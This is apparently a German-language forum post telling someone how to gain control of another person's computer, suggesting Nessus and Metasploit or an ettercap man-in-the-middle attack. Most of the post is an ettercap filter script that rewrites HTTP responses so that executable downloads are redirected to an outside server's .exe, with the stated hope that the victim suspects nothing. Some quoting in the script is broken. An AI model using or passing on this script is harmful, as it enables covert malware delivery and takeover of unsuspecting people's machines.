wenn du kontrolle über sein system willst, könntest du einmal nessus + metasploit versuchen, oder du manipulierst gleich den ganzen traffic mit ettercap und ersetzt sämtliche downloadanfragen von exe dateien mit deinem server (und hoffst, dass er keinen verdacht schöpft^^):
Code:
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");
}
}